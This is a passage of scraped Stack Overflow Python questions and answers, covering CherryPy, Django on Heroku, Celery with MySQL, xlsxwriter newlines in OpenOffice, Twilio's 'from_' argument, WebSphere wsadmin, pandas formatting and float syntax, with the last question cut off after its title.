iterating a single item list faster than iterating a long string? #Python #Cherrypy
38,708,672
<p>When using CherryPy, I ran into this comment: "strings get wrapped in a list because iterating over a single item list is much faster than iterating over every character in a long string." It is located at <a href="https://github.com/cherrypy/cherrypy/blob/master/cherrypy/lib/encoding.py#L223" rel="nofollow">https://github.com/cherrypy/cherrypy/blob/master/cherrypy/lib/encoding.py#L223</a>. I have done some research online, but I still don't fully understand the reason for wrapping <code>response.body</code> as <code>[response.body]</code>. Can anyone explain the details behind this design? </p>
-1
2016-08-01T21:48:40Z
38,708,904
<p>I think that code only makes sense if you recognize that, prior to the code with that comment, <code>self.body</code> could be either a single string or an iterable sequence containing many strings. Other code will use it as the latter (iterating over it and doing string operations with the items).</p> <p>While it would technically work to let that later code loop over the characters of the single string, processing the data character by character is likely inefficient. So the code below the comment wraps a list around the single string, letting it get processed all at once.</p>
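A stripped-down sketch (not CherryPy's actual code) of why the wrapping matters to downstream consumers:

```python
def consume(body):
    """Simulates downstream code that iterates over body chunks."""
    chunks = []
    for chunk in body:
        chunks.append(chunk)
    return chunks

body = "a long response string"

# Iterating the bare string yields it one character at a time:
# 22 single-character chunks for this 22-character string.
assert consume(body) == list(body)
assert len(consume(body)) == len(body)

# Wrapping it in a list yields the whole string as one chunk.
assert consume([body]) == [body]
assert len(consume([body])) == 1
```

Either way the downstream loop sees "an iterable of strings", but the wrapped version does its string work in a single pass instead of once per character.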
2
2016-08-01T22:11:10Z
[ "python", "cherrypy" ]
TemplateDoesNotExist at / base/index.html when deploying to heroku
38,708,729
<p>I've been working on this issue for days and I would really love some real help here! :)</p> <p>I'm brand new to Python, Django, and stackoverflow, so please let me know if more information or a different format would be helpful. </p> <p>I'm trying to deploy my app on Heroku. It runs locally, but when I try to </p> <blockquote> <p>heroku open</p> </blockquote> <p>I get the following error: </p> <blockquote> <p>TemplateDoesNotExist at / base/index.html</p> </blockquote> <p>I've seen this happen to others, and I've tried the following fixes which haven't worked:</p> <ul> <li>Changing the folder structure by putting index.html directly into templates instead of templates>base>index.html (<a href="http://stackoverflow.com/questions/30415562/templatedoesnotexist-when-base-template-is-in-root-folder?rq=1">TemplateDoesNotExist when base template is in root folder</a>) - This causes the app to stop running locally <ul> <li>Adding templates as an installed app (like I did for core) by adding </li> </ul></li> </ul> <blockquote> <p>(r'', include('templates.urls')),</p> </blockquote> <p>to my urls.py</p> <p>and added </p> <blockquote> <p>'templates'</p> </blockquote> <p>to my settings.py. This caused the app to stop running locally, so I changed it back. </p> <ul> <li>changed my views.py from:</li> </ul> <blockquote> <pre><code>from django.shortcuts import render from django.views.generic.base import TemplateView # Create your views here. class LandingView(TemplateView): template_name = "base/index.html" </code></pre> </blockquote> <p>to</p> <blockquote> <pre><code>from django.shortcuts import render from django.views.generic.base import TemplateView # Create your views here. 
class LandingView(TemplateView): template_name = [os.path.join(MAIN_DIR, 'coffeedapp2/templates')], </code></pre> </blockquote> <ul> <li>checked to make sure I have standard Django 1.8x template settings (<a href="http://stackoverflow.com/questions/30018847/templatedoesnotexist-at-base-index-html">TemplateDoesNotExist at / base/index.html</a>) <ul> <li>tried changing my views.py from:</li> </ul></li> </ul> <blockquote> <pre><code>from django.shortcuts import render from django.views.generic.base import TemplateView # Create your views here. class LandingView(TemplateView): template_name = "base/index.html" </code></pre> </blockquote> <p>to</p> <blockquote> <pre><code>from django.shortcuts import render from django.views.generic.base import TemplateView # Create your views here. class LandingView(TemplateView): template_name = "base/index.html" </code></pre> </blockquote> <p>(<a href="http://stackoverflow.com/questions/36981074/templatedoesnotexist-at-at-templates-index-html">TemplateDoesNotExist at / at templates/index.html</a>)</p> <p>I'm thinking that I may need to define a SITE_ROOT or something but whenever I try to do that it stops running locally. 
</p> <p><strong>ERROR:</strong></p> <blockquote> <p>TemplateDoesNotExist at / base/index.html Request Method: GET Request URL: <a href="https://salty-journey-18003.herokuapp.com/" rel="nofollow">https://salty-journey-18003.herokuapp.com/</a> Django Version: 1.9.7 Exception Type: TemplateDoesNotExist Exception Value: base/index.html Exception Location: /app/.heroku/python/lib/python2.7/site-packages/django/template/loader.py in select_template, line 74 Python Executable: /app/.heroku/python/bin/python Python Version: 2.7.12 Python Path: ['/app', '/app/.heroku/python/bin', '/app/.heroku/python/lib/python2.7/site-packages/setuptools-23.1.0-py2.7.egg', '/app/.heroku/python/lib/python2.7/site-packages/pip-8.1.2-py2.7.egg', '/app', '/app/.heroku/python/lib/python27.zip', '/app/.heroku/python/lib/python2.7', '/app/.heroku/python/lib/python2.7/plat-linux2', '/app/.heroku/python/lib/python2.7/lib-tk', '/app/.heroku/python/lib/python2.7/lib-old', '/app/.heroku/python/lib/python2.7/lib-dynload', '/app/.heroku/python/lib/python2.7/site-packages'] Server time: Mon, 1 Aug 2016 20:50:53 +0000 Template-loader postmortem</p> <p>Django tried loading these templates, in this order:</p> <p>Using engine django: django.template.loaders.filesystem.Loader: /coffeedapp2/templates/base/index.html (Source does not exist) django.template.loaders.app_directories.Loader: /app/.heroku/python/lib/python2.7/site-packages/django/contrib/admin/templates/base/index.html (Source does not exist) django.template.loaders.app_directories.Loader: /app/.heroku/python/lib/python2.7/site-packages/django/contrib/auth/templates/base/index.html (Source does not exist)</p> </blockquote> <p>settings.py</p> <p>"""</p> <pre><code>Django settings for coffeedapp2 project. Generated by 'django-admin startproject' using Django 1.9.7. 
For more information on this file, see https://docs.djangoproject.com/en/1.9/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.9/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) MAIN_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '^h)ohz4qbhu&amp;5po084_ob8qy+1c*h^tb#jtab!p965^8@&amp;64q!' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'core', ] MIDDLEWARE_CLASSES = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'coffeedapp2.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(MAIN_DIR, 'coffeedapp2/templates')], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.contrib.auth.context_processors.auth', 'django.template.context_processors.debug', 'django.template.context_processors.i18n', 'django.template.context_processors.media', 'django.template.context_processors.static', 'django.template.context_processors.tz', 
'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'coffeedapp2.wsgi.application' # Database # https://docs.djangoproject.com/en/1.9/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Update database configuration with $DATABASE_URL. import dj_database_url db_from_env = dj_database_url.config() DATABASES['default'] = dj_database_url.config() # Honor the 'X-Forwarded-Proto' header for request.is_secure() SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https') # Allow all host headers ALLOWED_HOSTS = ['*'] # Password validation # https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.9/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.9/howto/static-files/ STATIC_URL = '/static/' STATICFILES_DIRS = ( os.path.join(MAIN_DIR, 'coffeedapp2', 'static'), ) </code></pre> <p>coffeedapp>urls.py</p> <pre><code>from django.conf.urls import url from django.contrib import admin from django.conf.urls import include from django.conf.urls import patterns urlpatterns = patterns('', url(r'^admin/', include(admin.site.urls)), (r'', include('core.urls')), ) </code></pre> <p>core>urls.py</p> <pre><code>from django.conf.urls import patterns, include, url import core.views as coreviews from django.conf.urls import include urlpatterns = patterns('', url(r'^$', coreviews.LandingView.as_view()), ) 
</code></pre> <p>core>views.py</p> <pre><code>from django.shortcuts import render from django.views.generic.base import TemplateView # Create your views here. class LandingView(TemplateView): template_name = "base/index.html" </code></pre> <p><a href="http://i.stack.imgur.com/45NUY.png" rel="nofollow">See image of file structure</a></p> <pre><code>Relevant file structure: coffeedapp2 coffeedapp2 _init_.py settings.py settings.py urls.py wsgi.py core migrations _init_.py admin.py apps.py models.py tests.py urls.py views.py static templates base index.html </code></pre>
0
2016-08-01T21:53:02Z
38,709,559
<p>In your <code>TEMPLATES</code> setting, try changing your <code>DIRS</code> setting to:</p> <pre><code>'DIRS': [os.path.join(BASE_DIR, 'templates')], </code></pre> <p>This is the usual approach; I cannot see any reason to use <code>MAIN_DIR</code> as you currently do.</p> <p>Keep the template as</p> <pre><code>template_name = "base/index.html" </code></pre>
0
2016-08-01T23:25:05Z
[ "python", "django", "heroku" ]
Django / mySQL - AttributeError: 'ForeignKey' object has no attribute 'IntegerField'
38,708,748
<p>I have a Django project which works fine on Windows, and I am trying to move it to Ubuntu. Some problems occur when I run <code>python manage.py runserver 8000</code>:</p> <blockquote> <p>File "/home/zhaojf1/Web-Interaction-APP/fileUpload_app/models.py", line 151, in Machine number_pins = models.IntegerField(blank=True, null=True)</p> <p>AttributeError: 'ForeignKey' object has no attribute 'IntegerField'</p> </blockquote> <p>Also, this column in the Machine table is not a foreign key.</p> <p>Code in models.py:</p> <pre><code>140 class Machine(models.Model): 141 model = models.ForeignKey('Model', db_column='model', blank=True, null=True) 142 sn = models.CharField(max_length=50, blank=True) 143 mine_lon = models.CharField(max_length=50, blank=True) 144 mine_lat = models.CharField(max_length=50, blank=True) 145 location = models.CharField(max_length=50, blank=True) 146 total_hours = models.IntegerField(blank=True, null=True) 147 travel_hours = models.IntegerField(blank=True, null=True) 148 machine_id = models.IntegerField(primary_key=True) 149 models = models.ForeignKey('Model', db_column='models', blank=True, null=True) 150 # photo_set_num = models.IntegerField(blank=True, null=True) 151 number_pins = models.IntegerField(blank=True, null=True) 152 class Meta: 153 managed = False 154 db_table = 'machine' </code></pre> <p>I have a MySQL database, and I generated models.py directly from MySQL using </p> <p><code>$ python manage.py inspectdb &gt; models.py</code></p>
1
2016-08-01T21:54:20Z
38,708,803
<p>Your field named <code>models</code> shadows the <code>models</code> imported from Django. You can either rename the field:</p> <pre><code>other_name_for_models = models.ForeignKey('Model', db_column='models', blank=True, null=True) </code></pre> <p>or import the module with a different name</p> <pre><code>from django.db import models as django_models class Machine(django_models.Model): models = django_models.ForeignKey('Model', db_column='model', blank=True, null=True) </code></pre>
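A hypothetical, Django-free sketch of the same shadowing: inside a class body, an assignment to `models` rebinds the name for every statement after it, so later attribute lookups hit the field value instead of the module.

```python
class models:
    """Stand-in for the imported django.db.models module."""
    @staticmethod
    def IntegerField():
        return "an IntegerField"

class Machine:
    # This assignment shadows `models` inside the class body...
    models = "a ForeignKey instance"
    # ...so this lookup now targets the string above and raises
    # AttributeError -- the same failure mode as in the question.
    try:
        number_pins = models.IntegerField()
    except AttributeError as exc:
        error = str(exc)

assert "IntegerField" in Machine.error
```

In the real traceback the shadowing value is a `ForeignKey` instance rather than a string, which is why the message reads `'ForeignKey' object has no attribute 'IntegerField'`.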
3
2016-08-01T22:00:10Z
[ "python", "mysql", "django" ]
openoffice calc - newline causes duplicate value in cells (pandas/openpyxl)
38,708,775
<p>Does anyone know how to work around a problem of OpenOffice Calc not handling newlines in cells correctly?</p> <p>I have a Python script that dynamically generates an Excel workbook using openpyxl via pandas.</p> <p>The script works fine, but when I view cells in OpenOffice that contain newlines, all the values are duplicated multiple times. If I open the same file using the Microsoft Excel Viewer everything is displayed correctly, and if I use a character other than a newline (e.g. comma, #, etc.) it displays fine in both as well. </p> <p>I have a workaround to go into the Excel file and replace a placeholder character using a macro, but I would like to avoid that if possible, as the process really needs to be completely automated. Also, because the file will be processed by another internal tool, I do need these cells to contain a newline and I can't change the character.</p> <p>I have also tried using chr(10) and/or chr(13), but in the former case it just gets replaced in the output by '\n' anyway, as expected.</p> <p>The code I'm currently using is similar to:</p> <pre><code>test_list = [] for x in range(1,18): test_list.append([ "value1", "\n".join(['element1', 'element2', 'element3']), "value3" ]) data_df = pd.DataFrame(test_list) fn = r'/path/to/excel/file.xlsx' writer = pd.ExcelWriter(fn, engine='xlsxwriter') data_df.to_excel(writer, sheet_name='Data', index=False, header=0) workbook = writer.book worksheet = writer.sheets['Data'] worksheet.set_column('A:ZZ',50, workbook.add_format({'text_wrap': True})) writer.save() </code></pre> <p>What happens with the element data is that it shows in the OpenOffice Calc cell as something like:</p> <p><a href="http://i.stack.imgur.com/OHys3.png" rel="nofollow"><img src="http://i.stack.imgur.com/OHys3.png" alt="Openoffice Cells"></a></p> <p>Oddly, the last item appears to be correct.</p> <p>The same data viewed as a list or via DataFrame.head() appears fine: </p> <pre><code>pprint(test_list) [['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ... ['value1', 'element1\nelement2\nelement3', 'value3']] data_df.head(18): 0 1 2 0 value1 element1\nelement2\nelement3 value3 1 value1 element1\nelement2\nelement3 value3 2 value1 element1\nelement2\nelement3 value3 ... 15 value1 element1\nelement2\nelement3 value3 16 value1 element1\nelement2\nelement3 value3 </code></pre> <p>It only happens when the data gets passed to the openpyxl library and viewed in OpenOffice.</p> <p>Thanks</p>
4
2016-08-01T21:57:08Z
38,725,267
<p>When I run your example with a recent Pandas and XlsxWriter I get the expected output in Excel:</p> <p><a href="http://i.stack.imgur.com/lMxNe.png" rel="nofollow"><img src="http://i.stack.imgur.com/lMxNe.png" alt="enter image description here"></a></p> <p>However, in this case Excel is automatically adjusting the height of row 2 to compensate. That may not be happening in OpenOffice. </p> <p>In which case you can set it explicitly like this:</p> <pre><code>worksheet.set_row(1, 45) </code></pre>
0
2016-08-02T15:55:27Z
[ "python", "openoffice-calc", "xlsxwriter" ]
openoffice calc - newline causes duplicate value in cells (pandas/openpyxl)
38,708,775
<p>Does anyone know how to work around a problem of OpenOffice Calc not handling newlines in cells correctly?</p> <p>I have a Python script that dynamically generates an Excel workbook using openpyxl via pandas.</p> <p>The script works fine, but when I view cells in OpenOffice that contain newlines, all the values are duplicated multiple times. If I open the same file using the Microsoft Excel Viewer everything is displayed correctly, and if I use a character other than a newline (e.g. comma, #, etc.) it displays fine in both as well. </p> <p>I have a workaround to go into the Excel file and replace a placeholder character using a macro, but I would like to avoid that if possible, as the process really needs to be completely automated. Also, because the file will be processed by another internal tool, I do need these cells to contain a newline and I can't change the character.</p> <p>I have also tried using chr(10) and/or chr(13), but in the former case it just gets replaced in the output by '\n' anyway, as expected.</p> <p>The code I'm currently using is similar to:</p> <pre><code>test_list = [] for x in range(1,18): test_list.append([ "value1", "\n".join(['element1', 'element2', 'element3']), "value3" ]) data_df = pd.DataFrame(test_list) fn = r'/path/to/excel/file.xlsx' writer = pd.ExcelWriter(fn, engine='xlsxwriter') data_df.to_excel(writer, sheet_name='Data', index=False, header=0) workbook = writer.book worksheet = writer.sheets['Data'] worksheet.set_column('A:ZZ',50, workbook.add_format({'text_wrap': True})) writer.save() </code></pre> <p>What happens with the element data is that it shows in the OpenOffice Calc cell as something like:</p> <p><a href="http://i.stack.imgur.com/OHys3.png" rel="nofollow"><img src="http://i.stack.imgur.com/OHys3.png" alt="Openoffice Cells"></a></p> <p>Oddly, the last item appears to be correct.</p> <p>The same data viewed as a list or via DataFrame.head() appears fine: </p> <pre><code>pprint(test_list) [['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ... ['value1', 'element1\nelement2\nelement3', 'value3']] data_df.head(18): 0 1 2 0 value1 element1\nelement2\nelement3 value3 1 value1 element1\nelement2\nelement3 value3 2 value1 element1\nelement2\nelement3 value3 ... 15 value1 element1\nelement2\nelement3 value3 16 value1 element1\nelement2\nelement3 value3 </code></pre> <p>It only happens when the data gets passed to the openpyxl library and viewed in OpenOffice.</p> <p>Thanks</p>
4
2016-08-01T21:57:08Z
38,727,080
<p>The code worked fine for me using OpenOffice 4.1.2 on Windows:</p> <p><a href="http://i.stack.imgur.com/BnVEj.png" rel="nofollow"><img src="http://i.stack.imgur.com/BnVEj.png" alt="enter image description here"></a></p> <p>For this screenshot, I double-clicked on the bottom of the second row to expand it. Before that, it just showed <code>element3</code> with a red triangle. But that seems different from the behavior you described.</p> <p><strong>EDIT</strong>:</p> <p>Ok, I can now confirm the problem. As you said, it occurs with the mysterious number of 18 items. It looks like a bug in OpenOffice, because there is not much difference in the XML files viewed by unzipping <code>file.xlsx</code>.</p> <p>I also tried adding CR and LF directly to the XML files, but this just resulted in:</p> <p><a href="http://i.stack.imgur.com/596Hc.png" rel="nofollow"><img src="http://i.stack.imgur.com/596Hc.png" alt="enter image description here"></a></p> <p>That leaves us with three solutions:</p> <ol> <li>Use LibreOffice instead, which does not have this problem (tested LO 5.1.0.3).</li> <li><a href="https://www.openoffice.org/qa/ooQAReloaded/ooQA-ReportBugs.html" rel="nofollow">Report the bug</a> and wait for a new version.</li> <li>Use OpenOffice's preferred <code>.ods</code> format instead of MS Office's preferred format.</li> </ol>
2
2016-08-02T17:38:17Z
[ "python", "openoffice-calc", "xlsxwriter" ]
Why is there an underscore following the "from" in the Twilio Rest API?
38,708,834
<p>In the <a href="https://www.twilio.com/docs/libraries/python#testing-your-installation" rel="nofollow">twilio python library</a>, we have this feature to create messages:</p> <p><code>from twilio.rest import TwilioRestClient </code></p> <p>and we can write:</p> <p><code>msg = TwilioRestClient.messages.create(body=myMsgString, from_=myNumber, to=yourNumber)</code></p> <p>My question is simple: why does an underscore follow the <code>from</code> parameter? Or why is that the parameter name? Is it because <code>from</code> is otherwise a keyword in Python and we differentiate variables from keywords with an underscore suffix? Is that actually necessary in this case?</p>
5
2016-08-01T22:02:56Z
38,708,867
<p>This is because <code>from</code> would be an invalid argument name, resulting in a <code>SyntaxError</code> - it's a python keyword.</p> <p>Appending a trailing underscore is the recommended way to avoid such conflicts mentioned in the <a href="https://www.python.org/dev/peps/pep-0008/#function-and-method-arguments">PEP8 style guide</a>:</p> <blockquote> <p>If a function argument's name clashes with a reserved keyword, it is generally better to append a single trailing underscore rather than use an abbreviation or spelling corruption. </p> </blockquote>
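Assuming nothing beyond the standard library, this is easy to check directly: `keyword.iskeyword` reports whether a name is reserved, and a parameter literally named `from` will not even compile, while `from_` is fine.

```python
import keyword

# `from` is a reserved keyword; `from_` is an ordinary identifier.
assert keyword.iskeyword("from")
assert not keyword.iskeyword("from_")

# Using `from` as a parameter name fails to compile at all...
try:
    compile("def create(body, from, to): pass", "<demo>", "exec")
    from_is_invalid = False
except SyntaxError:
    from_is_invalid = True
assert from_is_invalid

# ...while the PEP 8 trailing-underscore spelling compiles fine.
compile("def create(body, from_, to): pass", "<demo>", "exec")
```

So yes, the underscore is necessary here: without it, Twilio's library could not expose that keyword argument at all.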
11
2016-08-01T22:07:15Z
[ "python", "twilio", "twilio-api" ]
Run Celery task for each row returned from MySQL query?
38,708,893
<p>I've used Python before, but only for Flask applications, and I've never used Celery before. After reading the docs and setting everything up (it works, as I've tested it with multiple workers), I'm trying to run an SQL query and, for each row returned from the query, send it off to be processed by a Celery worker.</p> <p>Below is a sample of the very basic code.</p> <pre><code>from celery import Celery import MySQLdb app = Celery('tasks', broker='redis://localhost:6379/0') @app.task def print_domain(): db = MySQLdb.connect(host="localhost", user="DB_USER", passwd="DB_PASS", db="DB_NAME") cur = db.cursor() cur.execute("SELECT * FROM myTable") for row in cur.fetchall(): print_query_result(row[0]) db.close() def print_query_result(result): print result </code></pre> <p>Basically, it selects everything in the 'myTable' table and prints each row returned. If I call the code using just Python, it works fine and prints all the data from the MySQL table. When I call it using the .delay() function to send it off to a worker, it only sends it to one worker and only outputs the top row in the database.</p> <p>I've been trying to read up on subtasks, but I'm not sure if I'm going in the right direction with that.</p> <p>In short, I want this to happen, but I have no idea where to start:</p> <ul> <li>SQL query to select all rows in table</li> <li>Send each row/result to a worker to process some code</li> <li>Return code result back into a database</li> <li>Pick up next item in queue (if any)</li> </ul> <p>Thanks in advance. 
</p> <p>EDIT 1:</p> <p>I've updated my code to use SQLAlchemy instead, but the results are still returning like my old query which is fine.</p> <pre><code>from celery import Celery from models import DBDomains app = Celery('tasks', broker='redis://localhost:6379/0') @app.task def print_domain(): query = DBDomains.query.all() for i in query: print i.domain print_query_result.s() @app.task def print_query_result(): print "Received job" print_domain.delay() </code></pre> <p>The worker when running the .py file returns:</p> <pre><code>[2016-08-02 02:08:40,881: INFO/MainProcess] Received task: tasks.print_domain[65d7667a-fc70-41f7-8caa-b991f360a9de] [2016-08-02 02:08:41,036: WARNING/Worker-3] result1 [2016-08-02 02:08:41,037: WARNING/Worker-3] result2 [2016-08-02 02:08:41,039: INFO/MainProcess] Task tasks.print_domain[65d7667a-fc70-41f7-8caa-b991f360a9de] succeeded in 0.154022816569s: None </code></pre> <p>As you can see, the worker gets 'result1' and 'result2' from the table I'm querying but then it doesn't seem to execute the command in the subtask which is just to print "Job received".</p> <p>UPDATE: It looks like the subtask had to have a .delay() on the end of it as per the Celery docs so my code looks like this and successfully distributes the jobs across the workers now.</p> <pre><code>from celery import Celery from models import DBDomains app = Celery('tasks', broker='redis://localhost:6379/0') @app.task def print_domain(): query = DBDomains.query.all() for i in query: subtask = print_query_result.s(i.domain) subtask.delay() @app.task def print_query_result(domain): print domain print_domain.delay() </code></pre>
0
2016-08-01T22:10:03Z
38,710,226
<p>Whenever you call a task from within a task, you have to use <a href="http://docs.celeryproject.org/en/latest/getting-started/next-steps.html#canvas-designing-workflows" rel="nofollow">subtasks</a>. Fortunately the syntax is easy.</p> <pre><code>from celery import Celery app = Celery('tasks', broker='redis://127.0.0.1:6379/0') @app.task def print_domain(): for x in range(20): print_query_result.s(x).delay() @app.task def print_query_result(result): print(result) </code></pre> <p>(Substitute <code>for x in range(20)</code> with your query results.) Note that <code>.s(x)</code> only builds a signature; you still need <code>.delay()</code> (or <code>.apply_async()</code>) on it to actually queue the subtask. If you're watching the celery output, you'll see the tasks created and distributed across the workers.</p>
1
2016-08-02T00:54:50Z
[ "python", "mysql", "celery" ]
EVault backup status outdated
38,708,939
<p>I am getting the latest backup job status of the EVault agents from the API, but for one job the status is outdated, even though the jobs have been running successfully every day, as reported by the EVault notification.</p> <h1>EVault notification</h1> <pre><code>Agent: Number 3 Job: BACKUP Daily Retention: DAILY Job start time: 31-Jul-2016 21:00:05 -0500 Job end time: 31-Jul-2016 21:00:30 -0500 Elapsed Time: 00:00:25 SafeSet: 00000252 </code></pre> <h1>API call</h1> <pre><code>SoftLayer_API['Account'].getEvaultNetworkStorage(mask='mask(SoftLayer_Network_Storage_Backup_Evault_Version6)[virtualGuest,hardware,backupJobDetails]')] </code></pre> <h1>Getting from the API (take a look at lastRunDate):</h1> <pre><code>{ 'username':'IBME657XXX-3', 'serviceResourceName':'ev-vaultdalxxxx.service.softlayer.com', 'id':728XXXX, 'backupJobDetails':[ { 'description':'Daily backups', 'lastRunDate':'2016-07-19T21:01:07-05:00', ... } ], ... } </code></pre> <h1>Expect to get from the API:</h1> <pre><code>{ 'username':'IBME657XXX-3', 'serviceResourceName':'ev-vaultdalXXXX.service.softlayer.com', 'id':728XXXX, 'backupJobDetails':[ { 'description':'Daily backups', 'lastRunDate':'2016-07-31T21:00:30-05:00', ... } ], ... } </code></pre> <p>Any idea what is wrong?</p>
0
2016-08-01T22:15:07Z
38,719,416
<p>Are you sure that is the last time the job ran? The content of the "backupJobDetails" property is ordered ascending, so the last run of the job is the last value in the "backupJobDetails" property.</p> <p>Also check whether you see the same wrong value in the control portal at <a href="https://control.softlayer.com/storage/evault" rel="nofollow">https://control.softlayer.com/storage/evault</a></p> <p>You might only see a small difference in the time, but that is likely because your EVault device and your SoftLayer account have different timezone configurations.</p> <p>If you are still seeing a big difference between the time displayed on your device and the time displayed in the Control Portal, it may be an issue, and I recommend you open a ticket with SoftLayer so they can look into it.</p> <p>Regards</p>
0
2016-08-02T11:38:52Z
[ "python", "softlayer" ]
IBM WebSphere Application Server wsadmin returning only first result out of 6 in script
38,709,006
<p>When attempting to get the status of applications in WebSphere Application Server, I expect multiple MBeans to be returned. However, WAS is only returning the first result and seems to discard the rest.</p> <pre><code>[wasadmin@servername01 ~]$ Run_wsadmin.sh -f wsadmin_Check_App_Status.py WASX7209I: Connected to process "dmgr" on node PRDDMGR using SOAP connector; The type of process is: DeploymentManager WASX7026W: String "type=Application,name=AMTApp,*" corresponds to 6 different MBeans; returning first one. </code></pre> <p>The script I'm running looks like this: </p> <pre><code>app_name = AppName app_status = AdminControl.completeObjectName('type=Application,name=' + app_name + ',*').split('\n') for status in app_status : print( status ) # end of For status in app_status </code></pre> <p>Is there some setting in WebSphere, or do I need to import some special library into my script? </p>
1
2016-08-01T22:22:30Z
38,709,310
<p>According to the doc of <code>AdminControl.completeObjectName()</code></p> <blockquote> <p>Use the completeObjectName command to create a string representation of a complete ObjectName value that is based on a fragment. This command does not communicate with the server to find a matching ObjectName value. <strong>If the system finds several MBeans that match the fragment, the command returns the first one.</strong></p> </blockquote> <p>So that function is behaving as expected.</p> <p><strong>Instead</strong>:<br> In this situation, it sounds like you want to use <code>AdminControl.queryNames()</code>, which is built for returning a list of results that match your query. </p> <p>For example:</p> <pre><code>app_name = AppName app_status = AdminControl.queryNames('type=Application,name=' + app_name + ',*').split('\n') for status in app_status : print( status ) </code></pre> <p>Source: <a href="https://www.ibm.com/support/knowledgecenter/SSAW57_8.0.0/com.ibm.websphere.nd.doc/info/ae/ae/rxml_admincontrol.html" rel="nofollow">Commands for the AdminControl object using wsadmin scripting</a></p>
3
2016-08-01T22:55:18Z
[ "python", "websphere", "ibm", "jython" ]
How to reformat dataframe, suppress exponential
38,709,017
<p>How can I reformat a pandas dataframe so that there is no scientific notation (exponents)? Also, <code>serial_num</code> should be an integer.</p> <p>I tried <code>df = pd.read_csv(StringIO('data.csv'))</code> but it didn't work.</p> <pre><code>df = pd.read_csv('data.csv') print df id serial_num membershipid date 0 1 ["374740"] 8.6948585e+7 2016-05-06 1 2 ["277474"] 5.2444556e+7 2016-05-06 2 3 ["394005"] 8.5948585e+7 2016-05-06 #Output should be this instead; id serial_num membershipid date 0 1 374740 86948585 2016-05-06 1 2 277474 52444556 2016-05-06 2 3 394005 85948585 2016-05-06 </code></pre>
2
2016-08-01T22:23:49Z
38,709,144
<p>Try:</p> <pre><code>df.membershipid = df.membershipid.astype(int) df.serial_num = df.serial_num.str.extract(r'"(.*)"', expand=False).astype(int) </code></pre> <p><a href="http://i.stack.imgur.com/pk5ez.png" rel="nofollow"><img src="http://i.stack.imgur.com/pk5ez.png" alt="enter image description here"></a></p>
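Under the hood, the `str.extract(r'"(.*)"')` call is a plain regex capture applied to each value; a standard-library sketch of the same transformation on a single value:

```python
import re

# One raw value as it appears in the column: a stringified list
# containing a quoted number.
raw = '["374740"]'

# Capture what sits between the double quotes, then cast to int --
# the same work str.extract does column-wide.
serial = int(re.search(r'"(.*)"', raw).group(1))
assert serial == 374740

# The membershipid column only needs the float -> int cast:
assert int(8.6948585e+7) == 86948585
```

Once both columns hold real integers, pandas prints them without scientific notation.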
2
2016-08-01T22:36:55Z
[ "python", "pandas" ]
What is the difference between float(44*2.2) and (float)(44*2.2) in PYTHON 3?
38,709,029
<p>If you type <code>float(44*2.2)</code> and <code>(float)(44*2.2)</code> into the interpreter, they return the same result. Is one explicitly casting the result, and one using it as a function? What is the use of each case, and are there any pros/cons for each? This is Python 3, though I'm sure it applies to Python 2 as well.</p>
0
2016-08-01T22:24:38Z
38,709,062
<p>Both usages invoke the built-in function <code>float</code>. In python, functions are just values, so <code>(float)</code> is the same function reference as <code>float</code>.</p> <p>There is no casting involved. I would prefer the first usage, because it's more clear.</p>
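A quick way to convince yourself of this in a REPL (a minimal sketch; nothing here is version-specific):

```python
f = (float)   # the parentheses just group an expression; there is no cast syntax
assert f is float                             # same built-in function object
assert (float)(44 * 2.2) == float(44 * 2.2)   # identical calls, identical results
print(type(f))   # float is itself an object (an instance of type)
```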
4
2016-08-01T22:27:40Z
[ "python" ]
What's the preferred python distribution if I want to package my env and code into one bundle
38,709,071
